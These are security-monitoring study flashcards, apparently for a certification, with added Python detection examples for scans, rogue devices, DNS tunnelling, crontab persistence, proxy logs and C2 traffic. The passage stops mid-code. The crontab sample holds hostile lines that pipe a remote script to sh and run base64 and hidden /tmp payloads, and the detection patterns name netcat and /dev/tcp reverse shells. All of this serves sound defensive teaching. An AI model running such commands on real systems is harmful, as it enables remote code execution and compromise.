D1 Ch3 Flashcards
Difference between an event and an incident
Event - any observable occurrence on a system or network, like a file download
Incident - an event (or series of events) that causes or may cause harm, like a security policy violation, unauthorized use/access, DoS, etc.
A notification caused by an event is called
Alert
3 common types of monitoring
Router-based monitoring
Active monitoring
Passive monitoring
A type of monitoring that provides information about the flow of traffic and about network devices. Sampled flow technologies (such as sFlow) only capture about 1 in 1000 or 1 in 100 packets for analysis.
Carried out by the network devices themselves (routers, switches)
Router-based monitoring
sFlow, NetFlow, and J-Flow are all types of what?
Flow capture technologies
Information about traffic that is passing through a router/switch is called
Network flow
SNMP is used for what type of monitoring?
Router-based
A type of monitoring that gathers information about availability, routes, packet delay/loss, and bandwidth.
Carried out by a monitoring device reaching out to other devices.
Active monitoring
Which two types of monitoring ADD traffic to a network?
Router-based
Active
A type of monitoring that is carried out as traffic passes a location on a net link
This method uses after-the-fact analysis
Passive monitoring
Which type of monitoring does NOT add traffic to a network?
Passive
4 methods used to detect bandwidth consumption
Tools that use flow data can show trend and status info indicating that network bandwidth utilization has peaked
Monitoring tools can be used to check for high usage levels and can send alarms based on thresholds
Real-time or near-real-time graphs can be used to monitor bandwidth as usage occurs
SNMP data can be used to monitor for high load and other signs of bandwidth utilization at the router or network device level
Methods of detecting data exfiltration (3)
Anomaly detection
Behavioral analysis
DLP systems/software
True/False
It’s easier to detect and stop data exfiltration while it is happening rather than to prevent it
False
It is easier to prevent than to detect and stop it while it occurs.
2 difficulties of detecting data exfiltration
Encryption is a common practice
Large volumes of traffic occur in large orgs
Data exfiltration red flags (2)
Internal servers reaching out to external systems
Large data transfers from sensitive file stores
Traffic sent from a zombie to its C2 server to request commands, provide status, or download additional malware is called
Beaconing
3 methods of detecting beaconing
IDS/IPS that identifies known botnet controllers or botnet behavior
Flow analysis tools
Traffic monitoring tools
2 reasons why detecting beaconing can be difficult
Encryption
High traffic volume
3 methods of detecting unexpected traffic
IDS/IPS behavior-based detection
Traffic monitoring systems
Manual observation
Common examples of unexpected traffic (6 - don’t need to memorize them, but broadly know them)
Scans
Sweeps
Spikes in traffic
Activity on unexpected ports
P2P traffic between systems that don’t normally communicate
Direct attack traffic
Understanding what is expected/unexpected traffic relies on 3 major techniques
List them and describe how they are used.
Baselines
monitoring systems alarm when baselines are exceeded by a given threshold or when behaviors deviate from baseline behaviors
Heuristics
Uses network security device-defined rules for scans, sweeps, attack traffic, etc.
Protocol analysis
Can find VPN traffic where no VPN traffic is expected, IPv6 tunnels in an IPv4 network, detect common protocols sent over an uncommon port, etc.
When a common protocol is used over an uncommon port, what can this mean? (2)
An attacker set up an alternate service port
A scan/sweep is underway
1 method of detecting a scan/sweep
IDS/IPS/firewalls that have built-in scan detection capabilities
Scan/sweep red flags (3)
Sequential testing of service ports
Connecting to many IP addresses
Repeated requests to services that may not be active
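The three red flags above, turned into detection logic. This is an added example, not part of the flashcards: the connection records and thresholds are constructed for illustration, and a real deployment would read them from firewall or flow logs.

```python
"""Scan/sweep detection over connection records.

Added example, not from the flashcards: the records and thresholds are
constructed for illustration (assumptions); a real deployment would read
them from firewall or flow logs. The three red flags checked are the ones on
the card: sequential port testing, one source touching many hosts, and
repeated requests to services that never answer.
"""
from collections import defaultdict
from typing import NamedTuple


class Conn(NamedTuple):
    src: str
    dst: str
    dport: int
    answered: bool  # True if the service replied; False if closed/filtered


# Constructed sample: 10.0.0.5 walks ports 20-39 on one host, then tries port 445
# on thirty hosts; 10.0.0.9 is an ordinary HTTPS client.
SAMPLE = (
    [Conn("10.0.0.5", "10.0.0.20", p, False) for p in range(20, 40)]
    + [Conn("10.0.0.5", f"10.0.0.{h}", 445, False) for h in range(30, 60)]
    + [Conn("10.0.0.9", "10.0.0.20", 443, True)] * 5
)


def detect_scans(conns, port_threshold=15, host_threshold=20, unanswered_threshold=10):
    """Return {source_ip: [reasons]} for sources matching scan/sweep red flags."""
    ports_per_host = defaultdict(set)   # (src, dst) -> distinct destination ports
    hosts_per_port = defaultdict(set)   # (src, dport) -> distinct destination hosts
    unanswered = defaultdict(int)       # src -> attempts that got no reply

    for c in conns:
        ports_per_host[(c.src, c.dst)].add(c.dport)
        hosts_per_port[(c.src, c.dport)].add(c.dst)
        if not c.answered:
            unanswered[c.src] += 1

    findings = defaultdict(list)
    for (src, dst), ports in ports_per_host.items():
        if len(ports) >= port_threshold:
            ordered = sorted(ports)
            # Sequential testing: the span of ports hit is about the number of ports hit.
            sequential = ordered[-1] - ordered[0] + 1 <= len(ordered) * 1.2
            kind = "sequential port scan" if sequential else "port scan"
            findings[src].append(f"{kind} of {dst}: {len(ports)} ports")
    for (src, dport), hosts in hosts_per_port.items():
        if len(hosts) >= host_threshold:
            findings[src].append(f"sweep of port {dport}: {len(hosts)} hosts")
    for src, n in unanswered.items():
        if n >= unanswered_threshold:
            findings[src].append(f"{n} attempts to services that did not answer")
    return dict(findings)


if __name__ == "__main__":
    for src, reasons in detect_scans(SAMPLE).items():
        print(src, "->", "; ".join(reasons))
```

The output is meant to be forwarded to a SIEM with the supporting log lines, in line with the card below about not responding directly to every scan.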
True/false
When you have detected a scan/sweep, you should immediately block the IP that is doing it
False
You should place the info/logs into a SIEM for analysis, and DO NOT respond directly
A type of scan that is more difficult to detect by automated means (IPS/IDS/firewall)
Stealth scan
3 patterns of DoS attacks
Attempts to overwhelm a network/service via a large volume of requests
Attacks on a service/system vulnerability to cause a failure
Attacks on an intermediary system/network to prevent traffic between two locations
What is one thing to keep in mind when trying to detect DoS attacks?
All 3 patterns of attack require different methods of detection
2 methods of stopping a DoS attack
Firewall or other device can block that system
IPS can block attack traffic
4 methods of detecting DoS and DDoS attacks
Performance monitoring tools (service performance monitoring)
Connection monitoring using local system or application logs
Network bandwidth or system bandwidth monitoring
Dedicated tools like IDSs or IPSs with DoS and DDoS detection rules enabled
5 methods of detecting “other” network attacks
Using an IDS/IPS
Monitoring flows, SNMP, and other network information for suspect behaviors
Feeding logs from firewalls, routers, switches, and other network devices to a central log analysis and monitoring system
Using a SIEM device to review the data and automatically alarm on problem traffic
Deploying host-level tools like EDR that monitor network behavior at the endpoint level
Devices that are connecting to a network when they should not be are called
Rogue devices
6 methods of detecting rogue devices
Valid MAC address checking (checks MAC address against a list of known devices)
MAC address vendor information checking (identifies devices based on their manufacturer via a vendor prefix on the MAC address)
Network scanning (performed using a tool like nmap to identify new devices)
Site surveys (physically verifying each device on-site, including checking wireless networks for wireless rogue detection)
Traffic analysis (identifies irregular/unexpected traffic)
Port scan with OS identification turned on (if a port scanner can't easily identify the device, that is a red flag)
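The first two methods on the card (valid MAC checking and MAC vendor checking) combined into one check. This is an added example, not from the flashcards: the inventory, the OUI table and the observed MAC/IP pairs are constructed, and a real check would load the full IEEE OUI registry and read observations from DHCP leases, ARP caches or switch MAC tables.

```python
"""Rogue device check: known-MAC list plus vendor-prefix (OUI) lookup.

Added example, not from the flashcards. The inventory, the OUI table and the
observed MAC/IP pairs are constructed for illustration (assumptions); a real
check would load the full IEEE OUI registry and read observations from DHCP
leases, ARP caches or switch MAC tables.
"""
import re

# Constructed inventory of approved devices (normalized MAC -> description).
KNOWN_DEVICES = {
    "00:50:56:AB:CD:01": "vm-web01 (VMware)",
    "B8:27:EB:00:00:42": "lab Raspberry Pi, approved",
}

# Tiny OUI table for the example; the real registry has tens of thousands of prefixes.
OUI_VENDORS = {
    "00:50:56": "VMware",
    "00:0C:29": "VMware",
    "B8:27:EB": "Raspberry Pi Foundation",
}
APPROVED_VENDORS = {"VMware"}


def normalize_mac(mac: str) -> str:
    """Accept 00:50:56:..., 00-50-56-..., or Cisco 0050.5612.3456 and return AA:BB:CC:DD:EE:FF."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2)).upper()


def is_locally_administered(mac: str) -> bool:
    """Bit 1 of the first octet set = locally administered (often a randomized MAC)."""
    return bool(int(mac[:2], 16) & 0x02)


def classify(observed):
    """observed: iterable of (mac, ip). Returns one verdict dict per device."""
    results = []
    for raw_mac, ip in observed:
        mac = normalize_mac(raw_mac)
        vendor = OUI_VENDORS.get(mac[:8])
        if mac in KNOWN_DEVICES:
            verdict = "known"
        elif is_locally_administered(mac):
            # Randomized MACs carry no vendor prefix; treat as unknown until verified on-site.
            verdict = "unknown: locally administered/randomized MAC"
        elif vendor is None:
            verdict = "unknown: unrecognised vendor prefix"
        elif vendor in APPROVED_VENDORS:
            verdict = "unknown: approved vendor but not in inventory"
        else:
            verdict = "unknown: unapproved vendor"
        results.append({"mac": mac, "ip": ip, "vendor": vendor, "verdict": verdict})
    return results


# Constructed observations, e.g. from a DHCP lease table.
OBSERVED = [
    ("00:50:56:ab:cd:01", "10.0.1.10"),
    ("0050.5612.3456", "10.0.1.11"),
    ("B8-27-EB-11-22-33", "10.0.1.12"),
    ("d2:11:22:33:44:55", "10.0.1.13"),
    ("00:11:22:33:44:55", "10.0.1.14"),
]

if __name__ == "__main__":
    for r in classify(OBSERVED):
        print(f"{r['mac']} {r['ip']:<12} {r['vendor'] or '?':<24} {r['verdict']}")
```

A MAC check alone is weak evidence, since MACs are trivially spoofed; a hit here should trigger the site survey or port-scan-with-OS-detection steps from the card, not be treated as proof either way.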
Wired rogues rely on what kind of networks to connect?
Open/unauthenticated
A security feature that checks for trusted MAC addresses
Port security
2 methods of preventing wired rogue devices
Port security
NAC
Which 4 system resources should be monitored continuously?
Processor (CPU)
Memory
Drive capacity
Filesystem changes and anomalies
Spikes in processor consumption in a system with otherwise consistent usage levels can indicate what?
New software or a process that was not previously active
Consistently high processor consumption can indicate what?
DoS condition
True/False
When monitoring memory consumption, you should be more focused on the amount of usage rather than the content of the memory
True
Microsoft centralized monitoring/management for drive capacity consumption
SCOM (System Center Operations Manager)
Linux drive capacity consumption and monitoring software
Nagios
Windows resource monitor allows visibility into the CPU, memory, disk, and network utilization for a system.
It is called…
resmon
Windows performance monitor provides much more detailed data with counters ranging from energy usage to disk and network activity. It also supports collection from remote systems.
It is called…
perfmon
When talking about Windows monitoring software, ____ is useful for detailed data collection, whereas ____ is useful for checking basic usage measures quickly.
Perfmon; resmon
A suite for Windows that provides extensive monitoring capabilities beyond the built-in set of tools (resmon and perfmon)
Sysinternals suite
Linux command that provides a snapshot view of CPU and memory usage, the time a process started, how long it’s been running, and the command that started each process
ps
Linux command that provides a continuous view of data similar to ps. It also supports interaction via hotkeys - for example, press P to sort by CPU usage, M to sort by memory usage, or A to toggle the alternate multi-window display.
top
Linux command that displays a report of the system’s disk usage, with various flags providing additional detail or formatting
df
Linux command that indicates which accounts are logged in
w
Detecting malware relies on 5 major methods:
Central management tools (manage software installation and report on installed software)
Antivirus/antimalware tools
EDR (detects and responds)
Software and file block listing
Application allow listing
True/False
Just like perfmon and resmon, Endpoint Manager monitors in real time
False
It does not monitor in real time
A common Linux command-line utility that allows you to create UDP/TCP connections using simple commands - commonly associated with penetration testing and compromises.
Its presence may indicate that your system is compromised (if you hadn’t downloaded it onto the system previously)
netcat
Abnormal OS behavior can be indicative of what kind of malware?
Rootkit
The unauthorized removal of data from systems/datastores
Data exfiltration
A type of attack that injects malicious libraries into processes in order to evade process-based defenses and elevate privileges.
DLL injection
3 methods used to conceal data exfiltration
Encryption
Sending data through commonly used channels (HTTP)
Sending data through covert channels like DNS requests or other services
A type of attack that encodes C2 messages or small amounts of data into inconspicuous DNS responses and queries
DNS tunnelling
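What DNS tunnelling looks like in a resolver's query log, and how to score it. This is an added example, not from the flashcards: the log lines are constructed in an assumed "timestamp client qname qtype" layout (no real resolver's format), and the thresholds are illustrative.

```python
"""Spotting DNS tunnelling (covert-channel exfiltration) in resolver query logs.

Added example, not from the flashcards. SAMPLE_LOG is constructed in an
assumed "timestamp client qname qtype" layout, not any real resolver's format.
Three signals are scored: unusually long labels, high-entropy labels (encoded
data looks random), and many distinct subdomains under one parent domain from
one client. Thresholds are illustrative assumptions.
"""
import math
from collections import Counter, defaultdict

SAMPLE_LOG = """\
2024-05-01T10:00:01 10.0.0.7 www.example.com A
2024-05-01T10:00:02 10.0.0.7 mail.example.com MX
2024-05-01T10:00:03 10.0.0.7 www.example.com A
2024-05-01T10:00:04 10.0.0.9 abcdefghijklmnopqrstuvwxyz012345.x.badexample.net TXT
2024-05-01T10:00:05 10.0.0.9 q7x2m9k4p1w8z3n6r5t0.x.badexample.net TXT
2024-05-01T10:00:06 10.0.0.9 c3.x.badexample.net TXT
2024-05-01T10:00:07 10.0.0.9 c4.x.badexample.net TXT
2024-05-01T10:00:08 10.0.0.9 c5.x.badexample.net TXT
2024-05-01T10:00:09 10.0.0.9 c6.x.badexample.net TXT
"""


def shannon_entropy(s: str) -> float:
    """Bits per character; ~4-5 for base64/hex payloads, ~2-3 for ordinary hostnames."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parse_log(text):
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than abort the hunt
        ts, client, qname, qtype = parts
        records.append((ts, client, qname.rstrip(".").lower(), qtype))
    return records


def detect_dns_tunneling(records, max_label=30, min_entropy=3.5, min_entropy_len=16, min_unique=5):
    findings = []
    subdomains = defaultdict(set)  # (client, parent domain) -> distinct subdomain prefixes
    for ts, client, qname, qtype in records:
        labels = qname.split(".")
        parent = ".".join(labels[-2:])  # naive: ignores multi-part suffixes like co.uk
        prefix = ".".join(labels[:-2])
        if prefix:
            subdomains[(client, parent)].add(prefix)
        longest = max(labels, key=len)
        reasons = []
        if len(longest) > max_label:
            reasons.append(f"label length {len(longest)}")
        ent = shannon_entropy(longest)
        if len(longest) >= min_entropy_len and ent >= min_entropy:
            reasons.append(f"entropy {ent:.2f} bits/char")
        if reasons:
            findings.append({"client": client, "qname": qname, "reasons": reasons})
    for (client, parent), prefixes in subdomains.items():
        if len(prefixes) >= min_unique:
            findings.append({"client": client, "qname": parent,
                             "reasons": [f"{len(prefixes)} distinct subdomains"]})
    return findings


if __name__ == "__main__":
    for f in detect_dns_tunneling(parse_log(SAMPLE_LOG)):
        print(f["client"], f["qname"], "; ".join(f["reasons"]))
```

CDNs and some security products also generate long, random-looking subdomains, so the per-domain count is the signal to trust most; the other two need an allow list of known noisy domains before they go into an alert.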
5 methods of detecting and responding to data exfiltration
EDR
IPS
DLP
Data tagging
Data protection
The process of assigning a metadata label to a piece of data in the form of key value pairs - for example, date created, department, author, file format, etc.
This enables you to more easily categorize, identify, search, manage, and protect the data.
Data tagging
Unauthorized access detection mechanisms:
Data logged
Location of data
Analysis tools
Data logged:
Authentication
User creation
Location of data:
Authentication logs
User creation logs
Analysis tools:
Central management suite
SIM/SIEM
Difference between SIM and SIEM
SIM (Security Information Management) focuses on log management and analysis. Allows administrators to run security reports, graphs, and charts in real time.
SIEM (Security Information and Event Management) combines both information management and event management. It allows administrators to look for malicious patterns or to monitor resource capacity management.
Unauthorized changes detection mechanisms:
Data logged
Location of data
Analysis tools
Data logged:
File creation
Settings changes
Location of data:
System logs
Application logs
Monitoring tools
Analysis tools:
Central management suite
SIM/SIEM
File and directory integrity checking tools (Tripwire)
Unauthorized privilege use detection mechanisms:
Data logged
Location of data
Analysis tools
Data logged:
Privilege use attempts
Privilege escalation
Location of data:
Security event logs
Application logs
Analysis tools:
SIM/SIEM
Log analysis tools
A Sysinternals feature that validates the access that a specific user/group has to objects (for privilege management)
AccessChk
2 common persistence techniques used in Windows Registry
Using Run/RunOnce keys to make programs run when the computer starts or a user logs in
Using the Windows Startup folder to run a program when a user logs in
Where is the registry run keys for the following root keys? (2 each)
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
2 methods to protect the Registry for infrequently-changed systems (like servers)
Application allow lists
Lockdown tools if you can’t use Registry monitoring tools
When protecting the Registry for a frequently-changed computer (like an endpoint), what is something to keep in mind?
Use an agent-based Registry monitoring tool to prevent false positives - changes are expected and happen many times per day with endpoints, so you don’t want to be bogged down with unnecessary alerts.
Scheduled tasks in Linux are called
cron jobs
Scheduled tasks (or cron jobs) are used by attackers to ____
Maintain persistence
3 methods to check scheduled tasks in Windows (one is specific to Windows 11)
Windows 10:
Start > Windows Administrative Tools > Task Scheduler
Windows 11:
Start > Windows Tools > Task Scheduler
Any Windows:
schtasks command (may pipe to more command)
3 methods to access cron in Linux
cat /etc/crontab
Or you can check the /etc/cron.d directory (and /etc/cron.hourly, /etc/cron.daily, etc.)
Or you can list the jobs with “crontab -l” (that is a lowercase L)
(optionally use the “-u root” flag to see commands run as root/equivalent users)
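Once you have the crontab contents, you still have to decide which entries matter. This is an added example, not from the flashcards: it parses a constructed /etc/crontab-style file and flags command patterns commonly used for persistence. The indicator list is illustrative, not exhaustive.

```python
"""Hunting for persistence in a system crontab.

Added example, not from the flashcards. CRONTAB_TEXT is a constructed
/etc/crontab-style file (fields: minute hour day month weekday user command);
per-user crontabs from "crontab -l" have no user field, so pass has_user=False
for those. The indicator patterns are illustrative, not an exhaustive list.
"""
import re

CRONTAB_TEXT = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 *   * * *   root    curl -s http://203.0.113.10/u.sh | sh
0 3     * * *   www-data python3 -c "import base64;exec(base64.b64decode('aW1wb3J0IG9z'))"
@reboot         root    /tmp/.x/agent -d
"""

# (regex over the command field, explanation)
SUSPICIOUS = [
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "downloads a script and pipes it to a shell"),
    (r"base64|b64decode", "base64-encoded payload"),
    (r"(^|\s)/(tmp|var/tmp|dev/shm)/", "runs from a world-writable directory"),
    (r"/\.[A-Za-z0-9]", "hidden path component"),
    (r"\b(nc|ncat|netcat)\b|/dev/tcp/", "netcat or bash /dev/tcp (reverse shell pattern)"),
]


def parse_crontab(text, has_user=True):
    """Return one dict per job line; skips blanks, comments and VAR=value lines."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        n_sched = 1 if line.startswith("@") else 5   # @reboot/@daily vs five time fields
        n_fixed = n_sched + (1 if has_user else 0)
        parts = line.split(None, n_fixed)
        if len(parts) < n_fixed + 1:
            continue  # malformed line: no command
        entries.append({
            "line": lineno,
            "schedule": " ".join(parts[:n_sched]),
            "user": parts[n_sched] if has_user else None,
            "command": parts[-1],
        })
    return entries


def find_suspicious(entries):
    findings = []
    for e in entries:
        reasons = [why for pattern, why in SUSPICIOUS if re.search(pattern, e["command"])]
        if reasons:
            findings.append({**e, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(parse_crontab(CRONTAB_TEXT)):
        print(f"line {f['line']} [{f['user']}] {f['schedule']}: {'; '.join(f['reasons'])}")
```

Run the same parser over each file in /etc/cron.d and over "crontab -l -u <user>" output (with has_user=False) so a job hidden in a less obvious location is not missed.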
Attacker’s method of exploiting the human element of security - used to gather information from targeted individuals
Social engineering
3 methods of social engineering detection
Awareness training
Timely reporting process that encourages staff to report social engineering without punishment
Analysis and response capabilities to determine impact and scope of impact upon success
A URL that is modified to hide the real location of a website - for example, a link looks legitimate at first, but when you hover over it, it shows an IP address rather than the expected website.
Obfuscated link
When investigating service- and application-related issues, what 3 areas of information are required?
Information about what services and apps are running
How they’re expected to behave
Self-reported and system-reported information about them
IoCs of a compromised service (4)
Incorrect behavior
Unexpected logs/errors
New users/processes
File changes
4 common app/service monitoring areas
Up/down (is the service running?)
Performance (does it respond quickly and as expected?)
Transactional logging (information about the function of the service - such as what actions users take or what actions are performed)
Application/service logging (log about the function or status of the service)
The common location for Linux application logs
/var/log
True/False
It is best practice to centralize log collection and analysis, especially since application logs can either go to a logging infrastructure or an app-specific directory/file
True
3 common methods to monitor new account creation (in a large organization)
Privileged account monitoring
Bulk account creation monitoring
Atypical time/location account creation monitoring
3 types of non-security related problems with applications/services
Application/service-specific errors, including authentication errors, service dependency issues, and permissions issues
Applications/services that don’t start on boot, either because of a specific error or because the service is disabled
Service failures, often caused by updates, patches, or other changes
Service/app troubleshooting steps (2)
Start/restart app/service
Check logs
App/service security protection (5)
Service monitoring tools
Log monitoring tools
Antimalware/antivirus/EDR
File integrity checking tools
Allow list tools
3 methods to check statuses of services on Windows
services.msc (Services administrative tool)
sc (command-line tool - Service Controller application that allows you to query, start, and stop services, specify error levels, and provide details about services)
PowerShell "Get-Service" cmdlet to check status ("Start-Service" is the cmdlet that starts a service)
2 methods to check status of services on Linux (and when to use each)
For most services:
service --status-all
For systems that use init.d:
/etc/init.d/servicename status (on systemd-based distributions, "systemctl status servicename" is the equivalent)
How do you view the Windows Application log? (2)
via Windows Event Viewer
Or you can centralize these logs using SCOM
Understanding typical app behavior requires 3 things:
Documentation of the app’s normal behavior (including what systems it should connect to, how those connections should be made)
Logging to provide a view of normal ops
Heuristic analysis using antimalware tools to flag when behaviors deviate from the norm
Difference between organizational and localized impact when it comes to a security incident
Organizational
How it affects the company as a whole, including operations, reputation, finances, and potentially even its legal standing
Localized
How it impacts a specific system, department, or user
Difference between immediate and total impact when it comes to a security incident
Immediate impact:
What is the problem right now, as the incident is happening?
Total impact:
Does this attack stand as a sign of a larger compromise or broad-scale attack? Is this part of a trend?
Windows logs that include Application, Security, Setup, and System event logs.
Windows Event Viewer (event logs)
Event Viewer can also be used to analyze what domain software’s logs?
Active Directory
Linux logs that provide information about the state of the system, events, and other details including application-specific logs.
Syslog (usually in the /var/log directory)
When reading syslogs in Linux, what type of events should you make sure to check?
sudo events
Logs that are captured by security devices about security events, system events, and other details useful to security analysts
Security device logs
Logs that capture the source/destination IP addresses of packets, the port and protocol, and what action was taken on traffic
Firewall logs
Logs captured by devices that aim to filter out attacks against web applications - often include alerts when attacks match the OWASP Top 10 or other common app security risks
WAF logs
Logs that capture the source/destination IP addresses, the source and destination ports, the requested resource, the date and time, and the content type and HTTP referrer as well as details about the content, such as the amount of traffic sent.
Proxy logs
When analyzing proxy logs, look for 4 things:
Target host IP, hostname, and what was requested
The amount of content requested (this may help indicate a compromise or match a known malicious package)
The HTTP request method
Unusual user agents and protocol versions, which may be useful for identifying applications, malware, or other targets
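The four checks above applied to proxy log lines. This is an added example, not from the flashcards: the log is constructed in an assumed space-separated layout (time client method status bytes url "user-agent"), so adapt parse_line() to your proxy's real field order; the thresholds and the scripted-client list are illustrative.

```python
"""Proxy log triage for the four things the card says to check.

Added example, not from the flashcards. LOG is constructed in an assumed
space-separated layout: time client method status bytes url "user-agent".
Real proxies use their own field orders, so adapt parse_line() accordingly.
Thresholds and the scripted-UA list are illustrative assumptions.
"""
import ipaddress
import re
import shlex
from urllib.parse import urlsplit

LOG = """\
2024-05-01T09:01:10 10.0.0.7 GET 200 5120 http://www.example.com/index.html "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
2024-05-01T09:02:15 10.0.0.7 GET 200 86000 http://cdn.example.com/app.js "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
2024-05-01T09:03:00 10.0.0.9 POST 200 52428800 http://203.0.113.10/upload "python-requests/2.31"
2024-05-01T09:03:30 10.0.0.9 CONNECT 200 1200 203.0.113.10:8443 "-"
2024-05-01T09:04:00 10.0.0.9 GET 200 2048 http://203.0.113.10/x.bin "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
2024-05-01T09:05:00 10.0.0.11 PUT 201 4096 http://203.0.113.10/api/v1/data "curl/8.5.0"
"""

SCRIPTED_UA = ("python-requests", "curl/", "wget/", "powershell", "go-http-client")
NORMAL_METHODS = {"GET", "POST", "HEAD"}
LARGE_BYTES = 10 * 1024 * 1024  # 10 MiB in one request is worth a look


def parse_line(line):
    ts, client, method, status, nbytes, url, ua = shlex.split(line)
    return {"ts": ts, "client": client, "method": method, "status": int(status),
            "bytes": int(nbytes), "url": url, "ua": ua}


def target(method, url):
    """Return (host, port). CONNECT requests carry host:port instead of a URL."""
    if method == "CONNECT":
        host, _, port = url.rpartition(":")
        return host, int(port)
    parts = urlsplit(url)
    return parts.hostname, parts.port or (443 if parts.scheme == "https" else 80)


def is_raw_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage(entry):
    """Reasons this entry deserves analyst attention (empty list = nothing odd)."""
    reasons = []
    host, port = target(entry["method"], entry["url"])
    if is_raw_ip(host):
        reasons.append(f"request to bare IP {host} (no hostname)")
    if entry["method"] not in NORMAL_METHODS and not (entry["method"] == "CONNECT" and port == 443):
        reasons.append(f"unusual method {entry['method']} to port {port}")
    if entry["bytes"] >= LARGE_BYTES:
        reasons.append(f"large transfer: {entry['bytes']} bytes via {entry['method']}")
    ua = entry["ua"].lower()
    if ua in ("", "-"):
        reasons.append("missing user agent")
    elif any(s in ua for s in SCRIPTED_UA):
        reasons.append(f"scripted client: {entry['ua']}")
    elif re.search(r"msie [1-8]\.", ua):
        reasons.append(f"obsolete browser user agent: {entry['ua']}")
    return reasons


def triage_log(text):
    flagged = []
    for line in text.strip().splitlines():
        entry = parse_line(line)
        reasons = triage(entry)
        if reasons:
            flagged.append((entry, reasons))
    return flagged


if __name__ == "__main__":
    for entry, reasons in triage_log(LOG):
        print(entry["ts"], entry["client"], entry["method"], entry["url"], "->", "; ".join(reasons))
```

Note that "large" is relative: a 50 MB POST from a workstation to a bare IP is a different thing from a 50 MB GET of a software update, so the method is kept in the reason text.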
A command that specifies the action a client wants to perform on a server resource, essentially telling the server what to do with the requested data, such as retrieving information (GET), creating new data (POST), updating existing data (PUT), or deleting data (DELETE)
HTTP request method
Logs that capture information about traffic that matched (triggered) a rule. These logs usually contain a lot of information about what is occurring at the application level - for example, you can search for rule hits that included a specific channel name or a nickname.
IDS/IPS logs
A centralized logging, data gathering, reporting, and analysis tool used to identify potential security issues.
Due to leveraging rules and filtering capabilities to perform analysis, this helps orgs deal with the massive volume of sec information generated by modern infrastructure.
SIEM
SIEM stands for
Security Information and Event Management
Tools that are deployed to endpoint systems, using agents to monitor for and detect potential security issues, attacks, and compromises.
The agents report to a central console or system, providing visibility and management capabilities.
This tool focuses on using threat patterns and IoCs as well as behavioral analysis. It can also respond automatically, either neutralizing the threat, containing it, or alerting security admins.
May also include forensic analysis and incident response tools
EDR
EDR stands for
Endpoint Detection and Response
Tools used to integrate security tools and systems using APIs or other integration methods. This allows admins to gather data from firewalls, vulnerability scanners, IDS/IPS, and more.
The data, alerting, and reporting centralization it provides then drives security automation tasks – triggering responses, correlation and alerting across disparate systems, and feeding analytics capabilities.
SOAR
SOAR stands for
Security Orchestration, Automation, and Response
What is a key element of SOAR tools?
Playbooks
Automated sets of actions that are used when specific sets of events or triggers occur
Playbooks
Tools that allow you to see traffic sent across network connections.
Packet capture tools
A graphical packet capture and inspection tool that is available for Linux, Windows, and Mac OS.
Wireshark
A command-line packet capture tool commonly available on Linux, but also available for other OSs. In fact, this one is built into many Linux distributions.
Tcpdump
If you are trying to analyze potentially-malicious traffic using a packet capture tool, but the traffic is encrypted, what can you do? (Besides decrypting the traffic)
Rely on behavior-based analysis: look at traffic patterns indicative of malware (known-bad sites, sending unexpected traffic on common ports, other abnormal behaviors)
A command that can be run in a command line in Linux by default, but must be added to Windows machines
Whois
A CLI command that will attempt to resolve the IP address or domain and provide information about it, including registration and contact information.
Also includes information like registrant name, organization, and address; admin name, organization, and address; etc.
Whois
A public, free database of IP addresses that are known to have been used for malicious activities.
AbuseIPDB
A common technique used by security administrators that gives them the ability to see common attack, exploit, and compromise patterns and to identify them for what they are.
Also used by AI or ML systems that look for known patterns associated with compromise or malicious activity.
Pattern recognition
Common C2 communication patterns: (7 - YOU MUST KNOW THESE)
Traffic to known-malicious IP addresses/networks
Traffic on unexpected ports
Traffic via protocols that are not typically in use, or outside the scope of normal traffic via that protocol
Large data transfers
Traffic associated w/ processes that typically would not send traffic like notepad.exe on a Windows system
Traffic sent at times of the day that are not normal
Other unexpected behaviors that don’t match typical use patterns
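The seven C2 patterns above, plus the beaconing detection from the earlier card, as one analysis over endpoint network events. This is an added example, not from the flashcards: the events are constructed in an assumed EDR-style shape (timestamp, host, process, destination, port, bytes sent), and the known-bad list, expected ports, no-network process list, working hours and thresholds are all illustrative assumptions.

```python
"""Flagging C2 communication patterns, including beaconing, in endpoint network events.

Added example, not from the flashcards (it also covers the beaconing-detection
card). Events are constructed in an assumed EDR-style shape; the known-bad
list, expected ports, "should never talk" process list, working hours and
thresholds are all illustrative assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev
from typing import NamedTuple


class NetEvent(NamedTuple):
    ts: datetime
    host: str
    process: str
    dst: str
    dport: int
    bytes_out: int


KNOWN_BAD_IPS = {"203.0.113.50"}
EXPECTED_PORTS = {53, 80, 443}
NO_NETWORK_PROCESSES = {"notepad.exe", "calc.exe", "mspaint.exe"}
WORK_HOURS = range(7, 19)          # 07:00-18:59, Monday to Friday
LARGE_TRANSFER = 50 * 1024 * 1024


def build_sample():
    """Constructed events: a notepad.exe beacon at 2 AM, normal browsing, and one big upload."""
    events = []
    start = datetime(2024, 5, 1, 2, 0, 0)  # a Wednesday
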